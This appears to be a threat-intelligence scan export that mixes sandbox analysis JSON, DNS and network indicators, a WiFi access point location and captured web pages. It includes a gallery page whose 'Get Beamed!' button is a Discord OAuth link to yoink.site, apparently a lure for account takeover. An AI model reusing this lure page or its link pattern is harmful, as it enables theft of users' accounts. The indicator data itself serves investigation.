{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:4968:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:4968:120:WilError_01"\n "Local\\SM0:6184:304:WilStaging_02"\n "Local\\SM0:6184:120:WilError_01"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:4968:304:WilStaging_02"\n "Local\\ChromeProcessSingletonStartup!"\n "Local\\SM0:4968:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7632:304:WilStaging_02"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpsminehut.com" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00004968]\n "f_00024d" has type "gzip compressed data from Unix original size modulo 2^32 58592"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00024d]- [targetUID: 00000000-00007808]\n "f_000268" has type "RIFF (little-endian) data Web/P image"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_000268]- [targetUID: 00000000-00007808]\n "ebb17067-94f8-450c-9568-a82216ca290c.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\ebb17067-94f8-450c-9568-a82216ca290c.tmp]- [targetUID: 00000000-00007808]\n "b242f73b8f8d800d_0" has type "data"- [targetUID: N/A]\n "59dc75d7-2547-49eb-9184-aee5038c9697.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 227208"- Location: [%TEMP%\\59dc75d7-2547-49eb-9184-aee5038c9697.tmp]- [targetUID: 00000000-00004968]\n "01e58febefcac415_0" has type "data"- [targetUID: N/A]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00004968]\n "5e42a7bd8f7f5c6d_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\5e42a7bd8f7f5c6d_0]- [targetUID: 00000000-00004968]\n "739aec52abd1ef18_0" has type "data"- [targetUID: N/A]\n "f_00023e" has type "gzip compressed data max compression original size modulo 2^32 389379"- [targetUID: N/A]\n "dd645e9d-3232-4e52-bf26-866b8133ca70.tmp" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "195beb76-9db3-4752-8dc5-1c9fb22b370e.tmp" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "db2a7507399ba0fe_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\db2a7507399ba0fe_0]- [targetUID: 00000000-00004968]\n "c9bd6e5856a90fb8_0" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00004968]\n "b2c20a88-d803-4261-8816-190344952cfd.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\b2c20a88-d803-4261-8816-190344952cfd.tmp]- [targetUID: 00000000-00004968]\n "f_000243" has type "gzip compressed data from Unix original size modulo 2^32 165367"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_000243]- [targetUID: 00000000-00007808]\n "23d3f5d3edbe4758_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\23d3f5d3edbe4758_0]- [targetUID: 00000000-00004968]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://minehut.com/"\n Pattern match: "https://minehut.com"\n Heuristic match: "ad-delivery.net"\n Heuristic match: "api.minehut.com"\n Heuristic match: "cdn.cookielaw.org"\n Heuristic match: "cdnjs.cloudflare.com"\n Heuristic match: "connect.facebook.net"\n Heuristic match: "content.minehut.com"\n Heuristic match: "core-lib.minehut.com"\n Heuristic match: "media.graphcms.com"\n Heuristic match: "pixel.tapad.com"\n Heuristic match: "privacyportal-cdn.onetrust.com"\n Heuristic match: "shell.minehut.com"\n Heuristic match: "tr.snapchat.com"\n Heuristic match: "utils-lib.minehut.com"\n Heuristic match: "vue-legacy-ui.minehut.com"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com" seems to be random'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/90 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-7', u'name': u'Uses network protocols on unusual ports', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1571', u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': u'T1571', u'relevance': 7, u'threat_level': 2, u'type': 7, u'description': u'TCP traffic to 54.176.41.87 on port 49733\n TCP traffic to 142.251.211.227 on port 49737\n TCP traffic to 104.26.9.123 on port 49738\n TCP traffic to 104.16.148.64 on port 49739\n TCP traffic to 185.93.1.247 on port 49740\n TCP traffic to 142.250.69.202 on port 49741\n TCP traffic to 142.250.217.66 on port 49743\n TCP traffic to 104.18.26.85 on port 49744\n TCP traffic to 104.17.24.14 on port 49746\n TCP traffic to 104.22.46.142 on port 49747\n TCP traffic to 13.227.44.89 on port 49748\n TCP traffic to 34.69.160.147 on port 49752\n TCP traffic to 34.136.45.84 on port 49753\n TCP traffic to 35.222.205.150 on port 49754\n TCP traffic to 34.70.254.254 on port 49755\n TCP traffic to 104.26.2.70 on port 49756\n TCP traffic to 34.136.205.209 on port 49758\n TCP traffic to 18.213.222.111 on port 49759\n TCP traffic to 54.161.234.33 on port 49765\n TCP traffic to 35.229.48.116 on port 49771\n TCP traffic to 142.250.217.72 on port 49772\n TCP traffic to 157.240.254.7 on port 49776\n TCP traffic to 54.230.58.252 on port 49778\n TCP traffic to 104.18.35.85 on port 49779\n TCP traffic to 35.190.43.134 on port 49780\n TCP traffic to 104.26.14.167 on port 49781\n TCP traffic to 172.67.75.33 on port 49782\n TCP traffic to 74.125.195.155 on port 49787\n TCP traffic to 157.240.22.35 on port 49788\n TCP traffic to 107.178.246.49 on port 49791\n TCP traffic to 35.203.130.56 on port 49796'}], u'threat_level': 2, u'size': None, u'job_id': u'63b1da6cb79fb1747e53944f', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_ide | 35.229.48.116 |
| 2023-05-12 03:18:06 | Externally Hosted Javascript | No | Page Information | 0 | 0 | 3 | 0 | None | https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | abay (Net ID: 00:08:5C:FB:81:BF) | 40.2024, 29.0398 |
| 2023-05-12 03:16:17 | Similar Domain | Yes | Tool - DNSTwist | 1 | 0 | 1 | 0 | None | ayshu.xyz | ayhu.xyz |
| 2023-05-12 02:57:46 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://tinyurl.com/madeinsuisse', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.20.138.65:443"\n "34.148.97.127:443"\n "3.125.5.245:443"\n "35.157.185.185:443"\n "172.253.122.95:443"\n "205.185.216.10:443"\n "104.18.22.52:443"\n "172.217.2.104:443"\n "172.64.202.28:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar53E7.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar5349.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar52DA.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar515F.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar5190.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_dac_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_dac_ConnHashTable<3500>_HashTable_Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_dac_IESQMMUTEX_0_303"\n "UpdatingNewTabPageData"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_dac_IESQMMUTEX_0_519"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_dac_IE_EarlyTabStart_0xa9c_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_dac_IESQMMUTEX_0_331"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3500"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.fickfreunde.de"\n "click.candyoffers.com"\n "fickfreunde.de"\n "kit.fontawesome.com"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "96063GA5.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\96063GA5.txt]- [targetUID: 00000000-00003500]\n Dropped file: "L8H735IT.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\L8H735IT.txt]- [targetUID: 00000000-00003500]\n Dropped file: "H5C14F22.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\H5C14F22.txt]- [targetUID: 00000000-00003448]\n Dropped file: "6CLV6E9L.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6CLV6E9L.txt]- [targetUID: 00000000-00003448]\n Dropped file: "L6N87E8V.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\L6N87E8V.txt]- [targetUID: 00000000-00003448]\n Dropped file: "NJN6P46V.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NJN6P46V.txt]- [targetUID: 00000000-00003448]\n Dropped file: "OOF6KCM3.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OOF6KCM3.txt]- [targetUID: 00000000-00003448]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab5348.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab515E.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab52D9.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab53D7.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab518F.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003448]\n "background_new.fd3a8456cceb346c0891c03198a60c38_1_.webp" has type "RIFF (little-endian) data Web/P image VP8 encoding 1000x503 Scaling: [none]x[none] YUV color decoders should clamp"- [targetUID: N/A]\n "scripts.7a620facbb6e924f312020771a5bdb6b_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "LWPZRw8np3l1Upuc936Fx8vKR2QcNtjyEhKbl2iD_1_.png" has type "PNG image data 114 x 114 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "css2_1_.css" has type "ASCII text"- [targetUID: N/A]\n "ass-nak-btn_1_.htm" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "free.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "_4C7A419C-64FD-11ED-885E-0800278B0884_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "common.774a6bb1c151f7a4ed117196fce2b316_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "RecoveryStore._A51FD2E3-64FA-11ED-885E-0800278B0884_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "96063GA5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\96063GA5.txt]- [targetUID: 00000000-00003500]\n "L8H735IT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\L8H735IT.txt]- [targetUID: 00000000-00003500]\n "7RZJQYK5.htm" has type "HTML document ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\VC2ME0V4\\7RZJQYK5.htm]- [targetUID: 00000000-00003448]\n "~DF2EDB88760F5A6FE9.TMP" has type "data"- Location: [%TEMP%\\~DF2EDB88760F5A6FE9.TMP]- [targetUID: 00000000-00003500]\n "Tar53E7.tmp" has type "data"- Location: [%TEMP%\\Tar53E7.tmp]- [targetUID: 00000000-00003448]\n "H5C14F22.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\H5C14F22.txt]- [targetUID: 00000000-00003448]\n "Cab5348.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab5348.tmp]- [targetUID: 00000000-00003448]\n "6CLV6E9L.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6CLV6E9L.txt]- [targetUID: 00000000-00003448]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://tinyurl.com/madeinsuisse"\n Pattern match: "https://tinyurl.com"\n Heuristic match: "cdn.fickfreunde.de"\n Heuristic match: "click.candyoffers.com"\n Heuristic match: "fickfreunde.de"\n Heuristic match: "kit.fontawesome.com"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"click.candyoffers.com" seems to be random'}], u'threat_level': 0, u'size': None, u'job_id': u'6373bbe282dc496f620ac840', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u' | 34.148.97.127 |
| 2023-05-12 03:15:35 | Web Content Language | No | Language Detector | 0 | 0 | 5 | 0 | None | English | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f603759cec44a')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="VxcMRN.Povw0Dqbul8wSiWYYVjQ65KTx3XK5wkMYn5s-1683860053-0-ARNnaczlk3lhWY6ESpfReTjviWNfe6-W-F4EYUMujv5K8wYIHcmyGNVxCdUrRWsobOaE65E16LH7Z5A8l3JcOOwM40OukBYU_NTnKQTXBbuAPfHcavNAVkFXDNA4yBYP_F-doeuxJ1iDDtJRrmlmohTnm9Zwgu_y8a0NK2hiUe5yMvTqp63OLXzd1V9ueCyVeeK1caOtPi7xaty2vJtyZb-cIX-pXe1HjTUlpS2SBgDHLt9Z2nGU34h6kZ0-LrtNlJwHFMEUfGQT7Cu-pfqrhaBF1Rf57tLrkAcE4ToZFW0ZJ0AzVaQzLYE6ZtSIvjdhsInZ4x-0ac4WkaSnH9qLZC0frRaKCRbP1YE5yAsA_V_rAzDvledqs23zFkADyA1JndB-r5YTwGkwDl-BxZREbNktpruk72pVubcgN5obrf6JxTrQq7YBfyWH0u231TmHhalG3kCxQTdf9BBK1RtcvNhrrH01RN3jUXWOknSbzfs0xXZvpHYZ1mrWn-Ojnk9ZjOu2ygM5UtHSoZUS6y_CjRifM_gopebOwo_cedROZOf9quaaEku8SOVh2-a-u3HQqhJrHKvyqASEjXgOG-POuVge4L6xHx2SHahOESPnWqqKrSn9BYMIGELPd8-r-1tIAXEFuooehRGS_FYNDjqh6omsTcRWSr06JGoopCVsOBkATKY4nwfmOjHwATatO_bzDcPIKUDDZxN4trvvcVPNVoHO7Bdkn5nD4MlhG7ULR5m8BGChjHXk7lMQgvxBm1SZz89qexKer_mB3ITW_Ckfp4tPj4-YUwZkcw1lp1dwi32IJwgxwAEQrcGYo7Dftq8CYuStupr8lXKN_XUjGqTozvnpHPRsKR3mpnU05jAAbQN-wTNmylPeMG1Bx9YvJ8-oBs6FOj2g79NCurzx8d8F26PjaGqr-vtP8UKYeQxLAnNdd4Vl3r7Sxgy5_U4ONoKkZLnzYO166hvNojFJrl5f4tJq3L8oaK1eV5U-xpdOk_jlFbI7ZzjrEUv9fZQsj5GaeDY02cHxOh7Nt2nNuGIpJ43yd7IG1NCu_ks7x5I0kfXv5MRuTfiROKF9xzm5F_CKasB2amUWk6rZYcXTrxdif9TD5Sx62vXZQpsnSXx8a6qRdl0hIJb_vmia5qIkaGS9V0c3xjS-IDsjcMXU8HgYzlCX19Zu4ALj-qepP0KcZOXiHhiswQ6RmzSNTHY19R5ZletASbYV_KRC2PP48Hz8WCb-SWTTkcwOaIfpq0-9SsU16FZzuVHDtQR9HgY0pbLMzaxY0s1xIpwF0xudNUa9SsK7hj88CJhBWAgyl0DKCHjlEvVNsM3bMb76uUbrGBKt7Hry85yQS5UEcYp6GIRihakXwCelMLh9b6mQeb34LGhQRPvlmLc3f7j1216yXCSaBd223eCCMmrLoB2g3nLwqwrk_PW2t_XaPAxAsSOOJKzId4VjA2dn6CqsOQIQ1btvcUPfq3OsFea8XgUx2qTK18l8oqMYjxkPX_FOwTDrD8XvSUg990Ur0PezzJ7ZjQhXW2g96qU5HlxCcEgvTZ1Oj8VsRG6KYZKs3liq65P7yZ1Xq0PuWGs5ZH1HZuwe_EUK0ctlgYcA2TZqiqR97ljhOugKeylE_8hYvCH-_EfG3w8eyicUcZHEEbELHsNXehd76Tx3s2-ebSEw5k9zImyOFTenD_lgPbpq7QTz7xoj2el_vnfxew2WRomnN2o-3wrcdpxXZbyRqTVEwh9mt5ldOWHagonTAv_Q_hf6-IdMAwmmBbSh1Hcp5U00qxCfbSDlsw6TbCjryraM_n5MuyIQ3ROmpzau0nYDihwg55Yfm_maTyXQn3EfPcgCTbGbUA-S1IM4kEvznOEUMKan7limYnMn